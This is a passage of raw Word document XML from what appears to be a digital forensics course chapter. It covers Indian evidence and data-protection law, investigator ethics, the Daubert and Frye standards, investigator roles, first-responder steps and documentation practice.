              <w:t xml:space="preserve">“Section 65B of the Indian Evidence Act (now Section 63 of the Bharatiya Sakshya Adhiniyam, 2023) makes electronic records admissible when accompanied by a certificate about the computer and the process of producing the record.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Search and seizure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An investigator cannot just take any phone or computer. There must be legal authority. Under the Code of Criminal Procedure (CrPC), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 91</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows a court or police officer to summon a person to produce a document or a thing (including electronic records), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 93</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deals with search warrants. The CrPC has been replaced by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bharatiya Nagarik Suraksha Sanhita (BNSS), 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains corresponding provisions (Sections 94 and 96) and also covers electronic communication and digital evidence. In a private organisation, authority comes from the company policy and written approval of management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Data protection — the DPDP Act, 2023</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic work often exposes emails, chats, photos, financial and medical data of people who are not even suspects. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital Personal Data Protection Act, 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets rules for handling personal data. The practical lesson for investigators: access to data for an investigation does not remove the duty to protect it. Collect only what is needed, store it securely, limit who can see it, and do not disclose it without authority.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ethics for the investigator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Work only with proper authorisation and within the defined scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Be honest and objective; report what the evidence shows, not what the client wants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep all case information confidential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not alter, plant or hide evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Admit the limits of your knowledge and your tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Admissibility of expert evidence — Daubert and Frye</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When an expert gives scientific or technical opinion in court, the court must decide whether the method behind that opinion is reliable. Two well-known standards come from the United States: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Standard</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Test applied by the court</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Frye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Frye v. United States</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, 1923)</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Is the technique </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">generally accepted</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the relevant scientific community?</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Daubert</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Daubert v. Merrell Dow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, 1993)</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more flexible test. The judge considers: Can the method be </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">tested</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">? Has it been </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">peer reviewed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">? What is its </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">known error rate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">? Are there </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">standards and controls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">? Is it </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">generally accepted</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">India does not formally follow Daubert or Frye, but Indian courts look at similar ideas when judging expert opinion (under the Evidence Act’s provision on expert opinion — now Section 39 of the BSA, 2023). Therefore forensic tools and methods should be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">validated, documented and widely accepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, whichever court is involved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.9 Investigator Roles, Responsibilities and Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Who is involved?</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Responsibility</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First responder</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first person who reaches the device or scene (IT administrator, SOC analyst, police officer, or investigator). Protects the scene and documents the state </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">before</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> touching anything.</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Forensic investigator / examiner</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Acquires, examines and analyses evidence, builds the timeline, writes the report, and may give expert testimony.</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Evidence custodian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Controls the evidence room and maintains the chain-of-custody records.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Team lead / case manager</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Defines scope, assigns work, communicates with management and legal teams.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Legal counsel / law enforcement</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Provides legal authority, advises on admissibility and handles court procedures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First responder — what to document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The golden rule is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">“document first, interact second.”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before touching a system, the first responder records:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Is the device powered on or off? What is on the screen? (photograph it)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Which devices are attached — USB drives, phones, external disks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Is it connected to a network or Wi-Fi?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Who is present at the location?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exact current date and time (and the time shown on the device, which may differ).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Qualities of a good forensic investigator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Strong technical knowledge — operating systems, file systems, networks and logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analytical thinking — connecting small pieces into a story.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attention to detail — one wrong timestamp or time-zone can change a conclusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Objectivity and integrity — no bias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Good communication — explaining technical findings to non-technical people.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Documentation best practices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">contemporaneous log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — write notes while working, not afterwards from memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record date, time (with time zone), the action taken, tool and version used, and the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
